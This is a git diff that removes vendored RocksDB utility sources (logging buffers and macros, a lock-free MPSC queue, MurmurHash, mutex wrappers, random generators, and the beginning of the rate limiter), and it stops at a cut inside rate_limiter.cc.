diff --git a/thirdparty/rocksdb/util/log_buffer.h b/thirdparty/rocksdb/util/log_buffer.h
deleted file mode 100644
index e356b93..0000000
--- a/thirdparty/rocksdb/util/log_buffer.h
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/env.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-#include "port/sys_time.h"
-#include <ctime>
-
-namespace rocksdb {
-
-class Logger;
-
-// A class to buffer info log entries and flush them in the end.
-class LogBuffer {
- public:
-  // log_level: the log level for all the logs
-  // info_log:  logger to write the logs to
-  LogBuffer(const InfoLogLevel log_level, Logger* info_log);
-
-  // Add a log entry to the buffer. Use default max_log_size.
-  // max_log_size indicates maximize log size, including some metadata.
-  void AddLogToBuffer(size_t max_log_size, const char* format, va_list ap);
-
-  size_t IsEmpty() const { return logs_.empty(); }
-
-  // Flush all buffered log to the info log.
-  void FlushBufferToLog();
-
- private:
-  // One log entry with its timestamp
-  struct BufferedLog {
-    struct timeval now_tv;  // Timestamp of the log
-    char message[1];        // Beginning of log message
-  };
-
-  const InfoLogLevel log_level_;
-  Logger* info_log_;
-  Arena arena_;
-  autovector<BufferedLog*> logs_;
-};
-
-// Add log to the LogBuffer for a delayed info logging. It can be used when
-// we want to add some logs inside a mutex.
-// max_log_size indicates maximize log size, including some metadata.
-extern void LogToBuffer(LogBuffer* log_buffer, size_t max_log_size,
-                        const char* format, ...);
-// Same as previous function, but with default max log size.
-extern void LogToBuffer(LogBuffer* log_buffer, const char* format, ...);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/log_write_bench.cc b/thirdparty/rocksdb/util/log_write_bench.cc
deleted file mode 100644
index 4008e43..0000000
--- a/thirdparty/rocksdb/util/log_write_bench.cc
+++ /dev/null
@@ -1,84 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <gflags/gflags.h>
-
-#include "monitoring/histogram.h"
-#include "rocksdb/env.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::SetUsageMessage;
-
-// A simple benchmark to simulate transactional logs
-
-DEFINE_int32(num_records, 6000, "Number of records.");
-DEFINE_int32(record_size, 249, "Size of each record.");
-DEFINE_int32(record_interval, 10000, "Interval between records (microSec)");
-DEFINE_int32(bytes_per_sync, 0, "bytes_per_sync parameter in EnvOptions");
-DEFINE_bool(enable_sync, false, "sync after each write.");
-
-namespace rocksdb {
-void RunBenchmark() {
-  std::string file_name = test::TmpDir() + "/log_write_benchmark.log";
-  Env* env = Env::Default();
-  EnvOptions env_options = env->OptimizeForLogWrite(EnvOptions());
-  env_options.bytes_per_sync = FLAGS_bytes_per_sync;
-  unique_ptr<WritableFile> file;
-  env->NewWritableFile(file_name, &file, env_options);
-  unique_ptr<WritableFileWriter> writer;
-  writer.reset(new WritableFileWriter(std::move(file), env_options));
-
-  std::string record;
-  record.assign(FLAGS_record_size, 'X');
-
-  HistogramImpl hist;
-
-  uint64_t start_time = env->NowMicros();
-  for (int i = 0; i < FLAGS_num_records; i++) {
-    uint64_t start_nanos = env->NowNanos();
-    writer->Append(record);
-    writer->Flush();
-    if (FLAGS_enable_sync) {
-      writer->Sync(false);
-    }
-    hist.Add(env->NowNanos() - start_nanos);
-
-    if (i % 1000 == 1) {
-      fprintf(stderr, "Wrote %d records...\n", i);
-    }
-
-    int time_to_sleep =
-        (i + 1) * FLAGS_record_interval - (env->NowMicros() - start_time);
-    if (time_to_sleep > 0) {
-      env->SleepForMicroseconds(time_to_sleep);
-    }
-  }
-
-  fprintf(stderr, "Distribution of latency of append+flush: \n%s",
-          hist.ToString().c_str());
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  rocksdb::RunBenchmark();
-  return 0;
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/util/logging.h b/thirdparty/rocksdb/util/logging.h
deleted file mode 100644
index 992e001..0000000
--- a/thirdparty/rocksdb/util/logging.h
+++ /dev/null
@@ -1,50 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Must not be included from any .h files to avoid polluting the namespace
-// with macros.
-
-#pragma once
-#include "port/port.h"
-
-// Helper macros that include information about file name and line number
-#define STRINGIFY(x) #x
-#define TOSTRING(x) STRINGIFY(x)
-#define PREPEND_FILE_LINE(FMT) ("[" __FILE__ ":" TOSTRING(__LINE__) "] " FMT)
-
-// Don't inclide file/line info in HEADER level
-#define ROCKS_LOG_HEADER(LGR, FMT, ...) \
-  rocksdb::Log(InfoLogLevel::HEADER_LEVEL, LGR, FMT, ##__VA_ARGS__)
-
-#define ROCKS_LOG_DEBUG(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::DEBUG_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_INFO(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::INFO_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_WARN(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::WARN_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_ERROR(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::ERROR_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_FATAL(LGR, FMT, ...)                                 \
-  rocksdb::Log(InfoLogLevel::FATAL_LEVEL, LGR, PREPEND_FILE_LINE(FMT), \
-               ##__VA_ARGS__)
-
-#define ROCKS_LOG_BUFFER(LOG_BUF, FMT, ...) \
-  rocksdb::LogToBuffer(LOG_BUF, PREPEND_FILE_LINE(FMT), ##__VA_ARGS__)
-
-#define ROCKS_LOG_BUFFER_MAX_SZ(LOG_BUF, MAX_LOG_SIZE, FMT, ...)      \
-  rocksdb::LogToBuffer(LOG_BUF, MAX_LOG_SIZE, PREPEND_FILE_LINE(FMT), \
-                       ##__VA_ARGS__)
diff --git a/thirdparty/rocksdb/util/memory_usage.h b/thirdparty/rocksdb/util/memory_usage.h
deleted file mode 100644
index 0d88544..0000000
--- a/thirdparty/rocksdb/util/memory_usage.h
+++ /dev/null
@@ -1,25 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <unordered_map>
-
-namespace rocksdb {
-
-// Helper methods to estimate memroy usage by std containers.
-
-template <class Key, class Value, class Hash>
-size_t ApproximateMemoryUsage(
-    const std::unordered_map<Key, Value, Hash>& umap) {
-  typedef std::unordered_map<Key, Value, Hash> Map;
-  return sizeof(umap) +
-         // Size of all items plus a next pointer for each item.
-         (sizeof(typename Map::value_type) + sizeof(void*)) * umap.size() +
-         // Size of hash buckets.
-         umap.bucket_count() * sizeof(void*);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/mpsc.h b/thirdparty/rocksdb/util/mpsc.h
deleted file mode 100644
index 7449fd3..0000000
--- a/thirdparty/rocksdb/util/mpsc.h
+++ /dev/null
@@ -1,158 +0,0 @@
-//  Portions Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Large parts of this file is borrowed from the public domain code below.
-// from https://github.com/mstump/queues
-
-// C++ implementation of Dmitry Vyukov's non-intrusive
-// lock free unbound MPSC queue
-// http://www.1024cores.net/home/
-// lock-free-algorithms/queues/non-intrusive-mpsc-node-based-queue
-
-// License from mstump/queues
-// This is free and unencumbered software released into the public domain.
-//
-// Anyone is free to copy, modify, publish, use, compile, sell, or
-// distribute this software, either in source code form or as a compiled
-// binary, for any purpose, commercial or non-commercial, and by any
-// means.
-//
-// In jurisdictions that recognize copyright laws, the author or authors
-// of this software dedicate any and all copyright interest in the
-// software to the public domain. We make this dedication for the benefit
-// of the public at large and to the detriment of our heirs and
-// successors. We intend this dedication to be an overt act of
-// relinquishment in perpetuity of all present and future rights to this
-// software under copyright law.
-//
-// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
-// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
-// IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
-// OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
-// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
-// OTHER DEALINGS IN THE SOFTWARE.
-//
-// For more information, please refer to <http://unlicense.org>
-
-// License from http://www.1024cores.net/home/
-// lock-free-algorithms/queues/non-intrusive-mpsc-node-based-queue
-// Copyright (c) 2010-2011 Dmitry Vyukov. All rights reserved.
-// Redistribution and use in source and binary forms, with or
-// without modification, are permitted provided that the following
-// conditions are met:
-// 1. Redistributions of source code must retain the above copyright notice,
-// this list of conditions and the following disclaimer.
-//
-// 2. Redistributions in binary form must reproduce the above copyright notice,
-// this list of conditions and the following disclaimer in the documentation
-// and/or other materials provided with the distribution.
-//
-// THIS SOFTWARE IS PROVIDED BY DMITRY VYUKOV "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
-// OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
-// EVENT SHALL DMITRY VYUKOV OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-// INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-// BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
-// USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// The views and conclusions contained in the software and documentation
-// are those of the authors and should not be interpreted as representing
-// official policies, either expressed or implied, of Dmitry Vyukov.
-//
-
-#ifndef UTIL_MPSC_H_
-#define UTIL_MPSC_H_
-
-#include <atomic>
-#include <cassert>
-#include <type_traits>
-
-/**
- * Multiple Producer Single Consumer Lockless Q
- */
-template <typename T>
-class mpsc_queue_t {
- public:
-  struct buffer_node_t {
-    T data;
-    std::atomic<buffer_node_t*> next;
-  };
-
-  mpsc_queue_t() {
-    buffer_node_aligned_t* al_st = new buffer_node_aligned_t;
-    buffer_node_t* node = new (al_st) buffer_node_t();
-    _head.store(node);
-    _tail.store(node);
-
-    node->next.store(nullptr, std::memory_order_relaxed);
-  }
-
-  ~mpsc_queue_t() {
-    T output;
-    while (this->dequeue(&output)) {
-    }
-    buffer_node_t* front = _head.load(std::memory_order_relaxed);
-    front->~buffer_node_t();
-
-    ::operator delete(front);
-  }
-
-  void enqueue(const T& input) {
-    buffer_node_aligned_t* al_st = new buffer_node_aligned_t;
-    buffer_node_t* node = new (al_st) buffer_node_t();
-
-    node->data = input;
-    node->next.store(nullptr, std::memory_order_relaxed);
-
-    buffer_node_t* prev_head = _head.exchange(node, std::memory_order_acq_rel);
-    prev_head->next.store(node, std::memory_order_release);
-  }
-
-  bool dequeue(T* output) {
-    buffer_node_t* tail = _tail.load(std::memory_order_relaxed);
-    buffer_node_t* next = tail->next.load(std::memory_order_acquire);
-
-    if (next == nullptr) {
-      return false;
-    }
-
-    *output = next->data;
-    _tail.store(next, std::memory_order_release);
-
-    tail->~buffer_node_t();
-
-    ::operator delete(tail);
-    return true;
-  }
-
-  // you can only use pop_all if the queue is SPSC
-  buffer_node_t* pop_all() {
-    // nobody else can move the tail pointer.
-    buffer_node_t* tptr = _tail.load(std::memory_order_relaxed);
-    buffer_node_t* next =
-        tptr->next.exchange(nullptr, std::memory_order_acquire);
-    _head.exchange(tptr, std::memory_order_acquire);
-
-    // there is a race condition here
-    return next;
-  }
-
- private:
-  typedef typename std::aligned_storage<
-      sizeof(buffer_node_t), std::alignment_of<buffer_node_t>::value>::type
-      buffer_node_aligned_t;
-
-  std::atomic<buffer_node_t*> _head;
-  std::atomic<buffer_node_t*> _tail;
-
-  mpsc_queue_t(const mpsc_queue_t&) = delete;
-  mpsc_queue_t& operator=(const mpsc_queue_t&) = delete;
-};
-
-#endif  // UTIL_MPSC_H_
diff --git a/thirdparty/rocksdb/util/murmurhash.cc b/thirdparty/rocksdb/util/murmurhash.cc
deleted file mode 100644
index 4d71d58..0000000
--- a/thirdparty/rocksdb/util/murmurhash.cc
+++ /dev/null
@@ -1,183 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-/*
-  Murmurhash from http://sites.google.com/site/murmurhash/
-
-  All code is released to the public domain. For business purposes, Murmurhash
-  is under the MIT license.
-*/
-#include "murmurhash.h"
-
-#if defined(__x86_64__)
-
-// -------------------------------------------------------------------
-//
-// The same caveats as 32-bit MurmurHash2 apply here - beware of alignment
-// and endian-ness issues if used across multiple platforms.
-//
-// 64-bit hash for 64-bit platforms
-
-uint64_t MurmurHash64A ( const void * key, int len, unsigned int seed )
-{
-    const uint64_t m = 0xc6a4a7935bd1e995;
-    const int r = 47;
-
-    uint64_t h = seed ^ (len * m);
-
-    const uint64_t * data = (const uint64_t *)key;
-    const uint64_t * end = data + (len/8);
-
-    while(data != end)
-    {
-        uint64_t k = *data++;
-
-        k *= m;
-        k ^= k >> r;
-        k *= m;
-
-        h ^= k;
-        h *= m;
-    }
-
-    const unsigned char * data2 = (const unsigned char*)data;
-
-    switch(len & 7)
-    {
-    case 7: h ^= ((uint64_t)data2[6]) << 48; // fallthrough
-    case 6: h ^= ((uint64_t)data2[5]) << 40; // fallthrough
-    case 5: h ^= ((uint64_t)data2[4]) << 32; // fallthrough
-    case 4: h ^= ((uint64_t)data2[3]) << 24; // fallthrough
-    case 3: h ^= ((uint64_t)data2[2]) << 16; // fallthrough
-    case 2: h ^= ((uint64_t)data2[1]) << 8; // fallthrough
-    case 1: h ^= ((uint64_t)data2[0]);
-        h *= m;
-    };
-
-    h ^= h >> r;
-    h *= m;
-    h ^= h >> r;
-
-    return h;
-}
-
-#elif defined(__i386__)
-
-// -------------------------------------------------------------------
-//
-// Note - This code makes a few assumptions about how your machine behaves -
-//
-// 1. We can read a 4-byte value from any address without crashing
-// 2. sizeof(int) == 4
-//
-// And it has a few limitations -
-//
-// 1. It will not work incrementally.
-// 2. It will not produce the same results on little-endian and big-endian
-//    machines.
-
-unsigned int MurmurHash2 ( const void * key, int len, unsigned int seed )
-{
-    // 'm' and 'r' are mixing constants generated offline.
-    // They're not really 'magic', they just happen to work well.
-
-    const unsigned int m = 0x5bd1e995;
-    const int r = 24;
-
-    // Initialize the hash to a 'random' value
-
-    unsigned int h = seed ^ len;
-
-    // Mix 4 bytes at a time into the hash
-
-    const unsigned char * data = (const unsigned char *)key;
-
-    while(len >= 4)
-    {
-        unsigned int k = *(unsigned int *)data;
-
-        k *= m;
-        k ^= k >> r;
-        k *= m;
-
-        h *= m;
-        h ^= k;
-
-        data += 4;
-        len -= 4;
-    }
-
-    // Handle the last few bytes of the input array
-
-    switch(len)
-    {
-    case 3: h ^= data[2] << 16; // fallthrough
-    case 2: h ^= data[1] << 8; // fallthrough
-    case 1: h ^= data[0];
-        h *= m;
-    };
-
-    // Do a few final mixes of the hash to ensure the last few
-    // bytes are well-incorporated.
-
-    h ^= h >> 13;
-    h *= m;
-    h ^= h >> 15;
-
-    return h;
-}
-
-#else
-
-// -------------------------------------------------------------------
-//
-// Same as MurmurHash2, but endian- and alignment-neutral.
-// Half the speed though, alas.
-
-unsigned int MurmurHashNeutral2 ( const void * key, int len, unsigned int seed )
-{
-    const unsigned int m = 0x5bd1e995;
-    const int r = 24;
-
-    unsigned int h = seed ^ len;
-
-    const unsigned char * data = (const unsigned char *)key;
-
-    while(len >= 4)
-    {
-        unsigned int k;
-
-        k  = data[0];
-        k |= data[1] << 8;
-        k |= data[2] << 16;
-        k |= data[3] << 24;
-
-        k *= m;
-        k ^= k >> r;
-        k *= m;
-
-        h *= m;
-        h ^= k;
-
-        data += 4;
-        len -= 4;
-    }
-
-    switch(len)
-    {
-    case 3: h ^= data[2] << 16; // fallthrough
-    case 2: h ^= data[1] << 8; // fallthrough
-    case 1: h ^= data[0];
-        h *= m;
-    };
-
-    h ^= h >> 13;
-    h *= m;
-    h ^= h >> 15;
-
-    return h;
-}
-
-#endif
diff --git a/thirdparty/rocksdb/util/murmurhash.h b/thirdparty/rocksdb/util/murmurhash.h
deleted file mode 100644
index cbfc406..0000000
--- a/thirdparty/rocksdb/util/murmurhash.h
+++ /dev/null
@@ -1,42 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-/*
-  Murmurhash from http://sites.google.com/site/murmurhash/
-
-  All code is released to the public domain. For business purposes, Murmurhash
-  is under the MIT license.
-*/
-#pragma once
-#include <stdint.h>
-#include "rocksdb/slice.h"
-
-#if defined(__x86_64__)
-#define MURMUR_HASH MurmurHash64A
-uint64_t MurmurHash64A ( const void * key, int len, unsigned int seed );
-#define MurmurHash MurmurHash64A
-typedef uint64_t murmur_t;
-
-#elif defined(__i386__)
-#define MURMUR_HASH MurmurHash2
-unsigned int MurmurHash2 ( const void * key, int len, unsigned int seed );
-#define MurmurHash MurmurHash2
-typedef unsigned int murmur_t;
-
-#else
-#define MURMUR_HASH MurmurHashNeutral2
-unsigned int MurmurHashNeutral2 ( const void * key, int len, unsigned int seed );
-#define MurmurHash MurmurHashNeutral2
-typedef unsigned int murmur_t;
-#endif
-
-// Allow slice to be hashable by murmur hash.
-namespace rocksdb {
-struct murmur_hash {
-  size_t operator()(const Slice& slice) const {
-    return MurmurHash(slice.data(), static_cast<int>(slice.size()), 0);
-  }
-};
-}  // rocksdb
diff --git a/thirdparty/rocksdb/util/mutexlock.h b/thirdparty/rocksdb/util/mutexlock.h
deleted file mode 100644
index 640cef3..0000000
--- a/thirdparty/rocksdb/util/mutexlock.h
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <assert.h>
-#include <atomic>
-#include <mutex>
-#include <thread>
-#include "port/port.h"
-
-namespace rocksdb {
-
-// Helper class that locks a mutex on construction and unlocks the mutex when
-// the destructor of the MutexLock object is invoked.
-//
-// Typical usage:
-//
-//   void MyClass::MyMethod() {
-//     MutexLock l(&mu_);       // mu_ is an instance variable
-//     ... some complex code, possibly with multiple return paths ...
-//   }
-
-class MutexLock {
- public:
-  explicit MutexLock(port::Mutex *mu) : mu_(mu) {
-    this->mu_->Lock();
-  }
-  ~MutexLock() { this->mu_->Unlock(); }
-
- private:
-  port::Mutex *const mu_;
-  // No copying allowed
-  MutexLock(const MutexLock&);
-  void operator=(const MutexLock&);
-};
-
-//
-// Acquire a ReadLock on the specified RWMutex.
-// The Lock will be automatically released then the
-// object goes out of scope.
-//
-class ReadLock {
- public:
-  explicit ReadLock(port::RWMutex *mu) : mu_(mu) {
-    this->mu_->ReadLock();
-  }
-  ~ReadLock() { this->mu_->ReadUnlock(); }
-
- private:
-  port::RWMutex *const mu_;
-  // No copying allowed
-  ReadLock(const ReadLock&);
-  void operator=(const ReadLock&);
-};
-
-//
-// Automatically unlock a locked mutex when the object is destroyed
-//
-class ReadUnlock {
- public:
-  explicit ReadUnlock(port::RWMutex *mu) : mu_(mu) { mu->AssertHeld(); }
-  ~ReadUnlock() { mu_->ReadUnlock(); }
-
- private:
-  port::RWMutex *const mu_;
-  // No copying allowed
-  ReadUnlock(const ReadUnlock &) = delete;
-  ReadUnlock &operator=(const ReadUnlock &) = delete;
-};
-
-//
-// Acquire a WriteLock on the specified RWMutex.
-// The Lock will be automatically released then the
-// object goes out of scope.
-//
-class WriteLock {
- public:
-  explicit WriteLock(port::RWMutex *mu) : mu_(mu) {
-    this->mu_->WriteLock();
-  }
-  ~WriteLock() { this->mu_->WriteUnlock(); }
-
- private:
-  port::RWMutex *const mu_;
-  // No copying allowed
-  WriteLock(const WriteLock&);
-  void operator=(const WriteLock&);
-};
-
-//
-// SpinMutex has very low overhead for low-contention cases.  Method names
-// are chosen so you can use std::unique_lock or std::lock_guard with it.
-//
-class SpinMutex {
- public:
-  SpinMutex() : locked_(false) {}
-
-  bool try_lock() {
-    auto currently_locked = locked_.load(std::memory_order_relaxed);
-    return !currently_locked &&
-           locked_.compare_exchange_weak(currently_locked, true,
-                                         std::memory_order_acquire,
-                                         std::memory_order_relaxed);
-  }
-
-  void lock() {
-    for (size_t tries = 0;; ++tries) {
-      if (try_lock()) {
-        // success
-        break;
-      }
-      port::AsmVolatilePause();
-      if (tries > 100) {
-        std::this_thread::yield();
-      }
-    }
-  }
-
-  void unlock() { locked_.store(false, std::memory_order_release); }
-
- private:
-  std::atomic<bool> locked_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/random.cc b/thirdparty/rocksdb/util/random.cc
deleted file mode 100644
index 5e2cf62..0000000
--- a/thirdparty/rocksdb/util/random.cc
+++ /dev/null
@@ -1,38 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include "util/random.h"
-
-#include <stdint.h>
-#include <string.h>
-#include <thread>
-#include <utility>
-
-#include "port/likely.h"
-#include "util/thread_local.h"
-
-#ifdef ROCKSDB_SUPPORT_THREAD_LOCAL
-#define STORAGE_DECL static __thread
-#else
-#define STORAGE_DECL static
-#endif
-
-namespace rocksdb {
-
-Random* Random::GetTLSInstance() {
-  STORAGE_DECL Random* tls_instance;
-  STORAGE_DECL std::aligned_storage<sizeof(Random)>::type tls_instance_bytes;
-
-  auto rv = tls_instance;
-  if (UNLIKELY(rv == nullptr)) {
-    size_t seed = std::hash<std::thread::id>()(std::this_thread::get_id());
-    rv = new (&tls_instance_bytes) Random((uint32_t)seed);
-    tls_instance = rv;
-  }
-  return rv;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/random.h b/thirdparty/rocksdb/util/random.h
deleted file mode 100644
index 2a5fcbc..0000000
--- a/thirdparty/rocksdb/util/random.h
+++ /dev/null
@@ -1,109 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <random>
-#include <stdint.h>
-
-namespace rocksdb {
-
-// A very simple random number generator.  Not especially good at
-// generating truly random bits, but good enough for our needs in this
-// package.
-class Random {
- private:
-  enum : uint32_t {
-    M = 2147483647L  // 2^31-1
-  };
-  enum : uint64_t {
-    A = 16807  // bits 14, 8, 7, 5, 2, 1, 0
-  };
-
-  uint32_t seed_;
-
-  static uint32_t GoodSeed(uint32_t s) { return (s & M) != 0 ? (s & M) : 1; }
-
- public:
-  // This is the largest value that can be returned from Next()
-  enum : uint32_t { kMaxNext = M };
-
-  explicit Random(uint32_t s) : seed_(GoodSeed(s)) {}
-
-  void Reset(uint32_t s) { seed_ = GoodSeed(s); }
-
-  uint32_t Next() {
-    // We are computing
-    //       seed_ = (seed_ * A) % M,    where M = 2^31-1
-    //
-    // seed_ must not be zero or M, or else all subsequent computed values
-    // will be zero or M respectively.  For all other values, seed_ will end
-    // up cycling through every number in [1,M-1]
-    uint64_t product = seed_ * A;
-
-    // Compute (product % M) using the fact that ((x << 31) % M) == x.
-    seed_ = static_cast<uint32_t>((product >> 31) + (product & M));
-    // The first reduction may overflow by 1 bit, so we may need to
-    // repeat.  mod == M is not possible; using > allows the faster
-    // sign-bit-based test.
-    if (seed_ > M) {
-      seed_ -= M;
-    }
-    return seed_;
-  }
-
-  // Returns a uniformly distributed value in the range [0..n-1]
-  // REQUIRES: n > 0
-  uint32_t Uniform(int n) { return Next() % n; }
-
-  // Randomly returns true ~"1/n" of the time, and false otherwise.
-  // REQUIRES: n > 0
-  bool OneIn(int n) { return (Next() % n) == 0; }
-
-  // Skewed: pick "base" uniformly from range [0,max_log] and then
-  // return "base" random bits.  The effect is to pick a number in the
-  // range [0,2^max_log-1] with exponential bias towards smaller numbers.
-  uint32_t Skewed(int max_log) {
-    return Uniform(1 << Uniform(max_log + 1));
-  }
-
-  // Returns a Random instance for use by the current thread without
-  // additional locking
-  static Random* GetTLSInstance();
-};
-
-// A simple 64bit random number generator based on std::mt19937_64
-class Random64 {
- private:
-  std::mt19937_64 generator_;
-
- public:
-  explicit Random64(uint64_t s) : generator_(s) { }
-
-  // Generates the next random number
-  uint64_t Next() { return generator_(); }
-
-  // Returns a uniformly distributed value in the range [0..n-1]
-  // REQUIRES: n > 0
-  uint64_t Uniform(uint64_t n) {
-    return std::uniform_int_distribution<uint64_t>(0, n - 1)(generator_);
-  }
-
-  // Randomly returns true ~"1/n" of the time, and false otherwise.
-  // REQUIRES: n > 0
-  bool OneIn(uint64_t n) { return Uniform(n) == 0; }
-
-  // Skewed: pick "base" uniformly from range [0,max_log] and then
-  // return "base" random bits.  The effect is to pick a number in the
-  // range [0,2^max_log-1] with exponential bias towards smaller numbers.
-  uint64_t Skewed(int max_log) {
-    return Uniform(uint64_t(1) << Uniform(max_log + 1));
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/rate_limiter.cc b/thirdparty/rocksdb/util/rate_limiter.cc
deleted file mode 100644
index b9160b2..0000000
--- a/thirdparty/rocksdb/util/rate_limiter.cc
+++ /dev/null
@@ -1,270 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/rate_limiter.h"
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/aligned_buffer.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-size_t RateLimiter::RequestToken(size_t bytes, size_t alignment,
-                                 Env::IOPriority io_priority, Statistics* stats,
-                                 RateLimiter::OpType op_type) {
-  if (io_priority < Env::IO_TOTAL && IsRateLimited(op_type)) {
-    bytes = std::min(bytes, static_cast<size_t>(GetSingleBurstBytes()));
-
-    if (alignment > 0) {
-      // Here we may actually require more than burst and block
-      // but we can not write less than one page at a time on direct I/O
-      // thus we may want not to use ratelimiter
-      bytes = std::max(alignment, TruncateToPageBoundary(alignment, bytes));
-    }
-    Request(bytes, io_priority, stats, op_type);
-  }
-  return bytes;
-}
-
-// Pending request
-struct GenericRateLimiter::Req {
-  explicit Req(int64_t _bytes, port::Mutex* _mu)
-      : request_bytes(_bytes), bytes(_bytes), cv(_mu), granted(false) {}
-  int64_t request_bytes;
-  int64_t bytes;
-  port::CondVar cv;
-  bool granted;
-};
-
-GenericRateLimiter::GenericRateLimiter(int64_t rate_bytes_per_sec,
